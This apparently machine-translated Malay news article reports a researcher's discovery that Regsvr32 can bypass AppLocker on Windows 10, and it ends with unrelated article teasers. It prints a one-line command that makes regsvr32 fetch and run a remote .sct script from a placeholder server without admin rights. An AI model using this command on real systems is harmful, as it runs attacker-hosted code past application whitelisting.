Regsvr32 boleh digunakan untuk memintas apliker pada tingkap 10
Video: КАК ЗАРЕГИСТРИРОВАТЬ dll библиотеку в windows 2024
Seorang penyelidik dari Colorado yang melancarkan nama, Casey Smith, mendapati bahawa Regsvr32 boleh digunakan untuk memintas AppLocker pada Windows 10, dan ini merupakan masalah besar bagi pengguna komputer, terutama mereka yang berada dalam persekitaran perniagaan.
AppLocker mula diperkenalkan pada Windows 7 dan Windows Server 2008 R2. Ia direka untuk membenarkan pentadbir menentukan kumpulan atau pengguna mana yang boleh memanfaatkan beberapa atau semua aplikasi berdasarkan identiti unik fail. Jika anda seorang yang cenderung menggunakan AppLocker, maka ia harus menjadi pengetahuan umum bahawa ia boleh digunakan untuk membuat peraturan tertentu untuk membolehkan aplikasi dijalankan atau menghentikannya di trek mereka.
Bagi mereka yang mungkin tidak sedar, Regvr32 boleh digunakan untuk mendaftarkan dan menyatukan DLL. Ini bukan satu-klik alat melihat kerana ia adalah utiliti baris arahan, jadi hanya pengguna komputer canggih harus berusaha untuk memanfaatkan apa yang ditawarkannya.
Kami memahami bahawa dengan menggunakan teknik ini, ia tidak mengubah registri sistem komputer, yang menjadikan sukar bagi pentadbir mengetahui apakah perubahan telah dibuat.
regsvr32 / s / n / u / i:http://server/file.sct scrobj.dll
"Perkara yang mengagumkan di sini ialah regsvr32 sudah diketahui oleh proksi, menggunakan TLS, mengikut arah pengalihan, dan sebagainya … Dan … Anda meneka binary MS ditandatangani, default. Jadi, semua yang perlu anda lakukan ialah tuan rumah fail.sci anda di lokasi yang anda kendalikan, "tulis Smith.
Teknik di atas tidak memerlukan keistimewaan pentadbiran dan ia tidak mengubah pendaftaran. Selain itu, skrip boleh dipanggil melalui HTTP atau HTTPS. Pada masa ini, Microsoft tidak mengeluarkan patch untuk masalah kecil ini, jadi satu-satunya pilihan pada ketika ini ialah menyekat Regsvr32 melalui Windows Firewall.
Menariknya, gergasi perisian masih belum bertindak balas mengenai isu keselamatan ini yang dihadapi oleh sistem pengendaliannya. Sekarang bahawa ia terbuka, kami mengharapkan untuk mendengar sesuatu daripada syarikat itu bersama dengan pembentangan patch masa depan.
Microsoft memintas operator untuk menyampaikan kemas kini ke peranti mudah alih tingkap
Ini adalah hari yang besar untuk Microsoft dan cara penyampaiannya. Yaitu, ini adalah kali pertama kemas kini dengan nombor yang sama dihantar kepada pengguna PC dan Windows 10 Mobile. Syarikat itu hanya mengeluarkan Windows 10 membangun 10586.29 untuk kedua platform Windows 10 dan Windows 10 Mobile. Ia juga ...
3 Vpns terbaik untuk Jerman memintas sekatan geografi pada tahun 2019
Apakah VPN terbaik untuk digunakan di Jerman? Kami cadangkan menggunakan Cyberghost VPN, NordVPN atau IPVanish. Alat ini akan sentiasa melindungi privasi dalam talian anda.
7 Antivirus terbaik untuk hdd luaran untuk digunakan pada tingkap 10 pada tahun 2019
Untuk memastikan HDD luar luaran dan selamat anda, anda perlu menggunakan perisian antivirus mandiri yang berkualiti tinggi. Ini perlu sentiasa dikemas kini juga. Sesetengah alat antivirus akan membolehkan anda memuat turun pangkalan data dan alat lain akan mengharuskan anda memuat turun keseluruhan perisian. Alat antivirus lain yang ...
